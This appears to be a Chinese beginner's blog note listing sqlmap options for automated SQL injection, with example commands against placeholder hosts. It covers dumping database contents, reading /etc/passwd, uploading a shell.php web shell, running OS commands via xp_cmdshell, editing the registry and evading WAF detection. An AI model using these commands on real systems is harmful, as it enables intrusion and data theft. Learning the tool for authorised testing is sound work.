標籤:帳號 選擇 inf param stop sys details force php
sqlmap自動注入
Enumeration【資料枚舉】
--privileges -U username【CU 當前帳號】
-D dvwa -T users -C user --columns 【指定資料庫,表,列】
--exclude-sysdbs 【排除系統層的庫】
*******************************************************************************
#查具體資料 【前提:當前資料庫使用者有權讀取information_schema庫】
--schema --batch --exclude-sysdbs 中繼資料【--batch:批處理,使用預設選項,直接出結果】
--count 【計數】
Dump資料
--dump, -C, -T, -D, --start, --stop
--dump-all --exclude-sysdbs
--sql-query "select * from users" 【前提:已查詢得知資料庫的表和列;自訂SQL查詢語句】
******************************************************************************
Brute force【當無許可權訪問information_schema,使用暴力破解】
須知
1、Mysql < 5.0 , 沒有 information_schema 庫
2、Mysql >= 5.0 但無權讀取information_schema 庫
3、使用的是微軟的access資料庫,預設無權讀取MSysObjects
--common-columns (Acess系統資料表無列資訊) 【若不指定列,預設為當前列】
UDF injection【自訂參數注入,屬於進階注入】
編譯共用庫建立並上傳至DB Sever,以此產生UDF實現進階注入
上傳檔案格式:Linux:shared object Windows:DLL
File system【檔案系統的訪問】
--file-read="/etc/passwd"
--file-write="shell.php" --file-dest "/tmp/shell.php" 【注入檔案必須存放在目前的目錄;上傳存放的目標目錄】
#預設儲存在:.sqlmap/output
OS 【作業系統的訪問】
LINUX系統:Mysql、postgresql
上傳共用庫並產生sys_exec()、sys_eval()兩個UDF
Windows系統:Mssql
利用xp_cmdshel預存程序(有就用,禁就啟,沒就建)
--sql-shell 【SQL的shell】
Windows Registry 【windows系統註冊表 前提:目前使用者有許可權對註冊表進行操作】
--reg-read
--reg-add
--reg-del
--reg-key、--reg-value、--reg-data、--reg-type
例如:sqlmap –u="http://1.1.1.1/a.aspx?id=1" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
General 【一般性函數】
-s:修改sqlite會話檔案儲存位置
預設:.sqlmap/output
-t:修改記錄流量檔案儲存位置
預設:.sqlmap/output
--charset:強制字元編碼
--charset=GBK
--crawl:指定從起始位置耙梳深度
--batch --crawl=3
--csv-del:指定其他分割符 【dump資料 預設存於” ,”分割的CSV檔案】
--csv-del=";"
--dbms-cred:指定資料庫帳號【前提:有資料庫管理系統的帳號密碼】
#查過的資料都儲存在Session中
--flush-session:清空Session 【當我們重新查詢相同網站的查詢,其查詢內容為前一次儲存的Session資料】
--force-ssl:針對https網站進行查詢
--fresh-queries:忽略Session查詢結果
--hex:以十六進位(原資料)形式dump非ASCII字元內容,收到後解碼還原,只是作用於通道
sqlmap -u "http://<ip>/s.php?id=1" --hex -v 3
--output-dir=/tmp 【指定輸出資料的目錄】
--parse-errors: 分析和現實資料庫內建報錯資訊,來判斷漏洞
sqlmap.py -u "http://<id>/sqlmap/a.asp?id=" --parse-errors
--save:將命令儲存成設定檔,指定儲存位置 【】
Miscellaneous 【雜項】
-z:參數助記符 【可簡寫,參數寫成參數集合】
如:sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u "1.1.1.1/a.asp?id=1"
sqlmap -z "bat,random,ign,tec=BEU" -u "1.1.1.1/a.asp?id=1"
--answer:設定不同的問題的參數【類似--batch】
sqlmap -u "http://<ip>/a.php?id=1" --technique=E --anser="extending=N" --batch
--check-waf:檢測WAF/IPS/IDS
--hpp:HTTP parameter pollution 【本質,WEB上的一個漏洞】
繞過WAF/IPS/IDS的有效方法
尤其對ASP/IIS和ASP.NET/IIS
--identity-waf:徹底的waf/ips/ids檢查 【因為有些WAF只過濾第一次出現的username】
支援30多種產品
*************************************************************************
--mobile:類比智能手機裝置
--purge-output:清除output檔案夾
--smart:當有大量檢測目標時,只選擇基於錯誤的檢測結果
--wizard:嚮導
小白日記46:kali滲透測試之Web滲透-SqlMap自動注入(四)-sqlmap參數詳解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous